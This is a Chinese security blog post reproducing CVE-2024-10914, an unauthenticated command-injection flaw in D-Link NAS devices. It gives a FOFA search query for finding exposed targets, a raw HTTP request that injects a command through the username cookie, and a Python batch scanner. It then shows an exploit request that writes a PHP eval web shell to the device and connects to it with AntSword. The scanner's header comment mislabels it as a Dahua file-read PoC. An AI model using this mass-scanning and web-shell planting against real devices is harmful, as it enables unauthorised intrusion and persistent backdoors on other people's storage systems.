D-Link NAS设备 sc_mgr.cgi 未授权RCE漏洞(CVE-2024-10914)

admin 2024年11月21日10:48:22评论143 views字数 3076阅读10分15秒阅读模式
产品简介

D.LinK NASQ 设备是一种基于网络的存储解决方案,作为网络存储设备,旨在为企业提供大容量的存储空间,并通过网络连接实现数据的访问和管理。这种设备不仅满足了企业对数据存储的需求,还提供了高效的数据共享和访问功能,提升了企业数据管理的效率和灵活性。广泛应用于各种企业场景,如文档存储、图片和视频存储、数据库备份等。特别是在需要高效数据共享和访问的企业环境中,如设计工作室、广告公司、医疗机构等,D-Link NAS设备更是发挥了其强大的功能和优势。

D-Link NAS设备 sc_mgr.cgi 未授权RCE漏洞(CVE-2024-10914)

漏洞概述

D-LinK NAS设备 /cgi-bin/sc mgrcgi?cmd=Sc Get nf0 接口存在远程命令执行漏洞,未经身份验证的远程攻击者可利用此漏洞执行任意系统命令,写入后门文件,获取服务器权限。

PS:这段时间,连出两个D-Link相关漏洞

FOFA

body="/cgi-bin/login_mgr.cgi"  &&  body="cmd=cgi_get_ssl_info"

D-Link NAS设备 sc_mgr.cgi 未授权RCE漏洞(CVE-2024-10914)

漏洞复现

GET /cgi-bin/sc_mgr.cgi?cmd=SC_Get_Info HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0Accept: */*Accept-Encoding: gzip, deflateConnection: closeCookie: username=mopfdfsewo'& id & echo 'mopfdfsewo;

D-Link NAS设备 sc_mgr.cgi 未授权RCE漏洞(CVE-2024-10914)

深度复现

这里,我们使用两种红岸的检测工具,第一代和第三代的

第一代,1、信息收集

第二利用poc进行批量检测

# .py#大华智能物联综合管理平台 任意文件读取漏洞复现(QVD-2023-45063)import requestsfrom requests.packages.urllib3.exceptions import InsecureRequestWarningfrom requests.exceptions import Timeoutimport osimport urllib.parseimport urllib.requestdef sc_send(text, desp='', key='[SENDKEY]'):    postdata = urllib.parse.urlencode({'text': text, 'desp': desp}).encode('utf-8')    urlserver = f'https://sctapi.ftqq.com/{key}.send'    req = urllib.request.Request(urlserver, data=postdata, method='POST')    with urllib.request.urlopen(req) as response:        result = response.read().decode('utf-8')    return resultkey = ""def scan_D_Link_NAS_sc_mgr_rce(url, proxies, headers, append_to_output):    proxies = {        'http': 'http://127.0.0.1:8080',        'https': 'http://127.0.0.1:8080'    }    if url.endswith("/"):        path = "cgi-bin/sc_mgr.cgi?cmd=SC_Get_Info"    else:        path = "/cgi-bin/sc_mgr.cgi?cmd=SC_Get_Info"    if not url.startswith('http://') and not url.startswith('https://'):        url = 'http://' + url    encodetext = url + path    append_to_output("===================================================================", "green")    append_to_output(f"扫描目标: {url}", "yellow")    headers = {    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0",    "Accept": "*/*",    "Accept-Encoding": "gzip, deflate",    "Connection": "close",    "Cookie": "username=mopfdfsewo'& id & echo 'mopfdfsewo;"  }    try:        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)        req1 = requests.get(encodetext, headers=headers, verify=False, timeout=20, proxies=proxies)        if req1.status_code == 200 and 'uid' in req1.text:            append_to_output(f"[+] {url} 存在D-Link NAS设备 sc_mgr.cgi 未授权RCE漏洞!!!!", "red")            ret = sc_send('发现D-Link NAS设备 sc_mgr.cgi 未授权RCE漏洞', f"漏洞连接: {url}rn漏洞类型: RCE漏洞", key)        else:            append_to_output(f"[-] {url} 不存在D-Link NAS设备 sc_mgr.cgi 未授权RCE漏洞", "green")    except Timeout:        append_to_output(f"[!] 请求超时,跳过URL: {url}", "yellow")    except Exception as e:        if 'HTTPSConnectionPool' in str(e) or 'Burp Suite Professional' in str(e):            append_to_output(f"[-] {url} 证书校验错误或者证书被拒绝", "yellow")        else:            append_to_output(str(e), "yellow")

D-Link NAS设备 sc_mgr.cgi 未授权RCE漏洞(CVE-2024-10914)

第三代检测脚本

可以直接输入fofa语句导入资产

D-Link NAS设备 sc_mgr.cgi 未授权RCE漏洞(CVE-2024-10914)

导入完成,可以选择对应的POC

D-Link NAS设备 sc_mgr.cgi 未授权RCE漏洞(CVE-2024-10914)

选择对应代理

D-Link NAS设备 sc_mgr.cgi 未授权RCE漏洞(CVE-2024-10914)

进行批量检测

D-Link NAS设备 sc_mgr.cgi 未授权RCE漏洞(CVE-2024-10914)

然后随便挑一个进行下一步

由于分号不让写入只能通过ascii转码

D-Link NAS设备 sc_mgr.cgi 未授权RCE漏洞(CVE-2024-10914)

EXP:GET /cgi-bin/sc_mgr.cgi?cmd=SC_Get_Info HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0Accept: */*Accept-Encoding: gzip, deflateConnection: closeCookie: username=mopfdfsewo'& echo -e '<?php @eval($_POST[cmd])x3B?>' > 1.php & echo 'mopfdfsewo;

蚁剑进行连接

路径为:http://IP/cgi-bin/1.php

由于我们进行了转码所以需要进行编码连接

D-Link NAS设备 sc_mgr.cgi 未授权RCE漏洞(CVE-2024-10914)

D-Link NAS设备 sc_mgr.cgi 未授权RCE漏洞(CVE-2024-10914)

连接成功!

原文始发于微信公众号(暗影网安实验室):【深度复现】D-Link NAS设备 sc_mgr.cgi 未授权RCE漏洞(CVE-2024-10914)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月21日10:48:22
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   D-Link NAS设备 sc_mgr.cgi 未授权RCE漏洞(CVE-2024-10914)https://cn-sec.com/archives/3419076.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息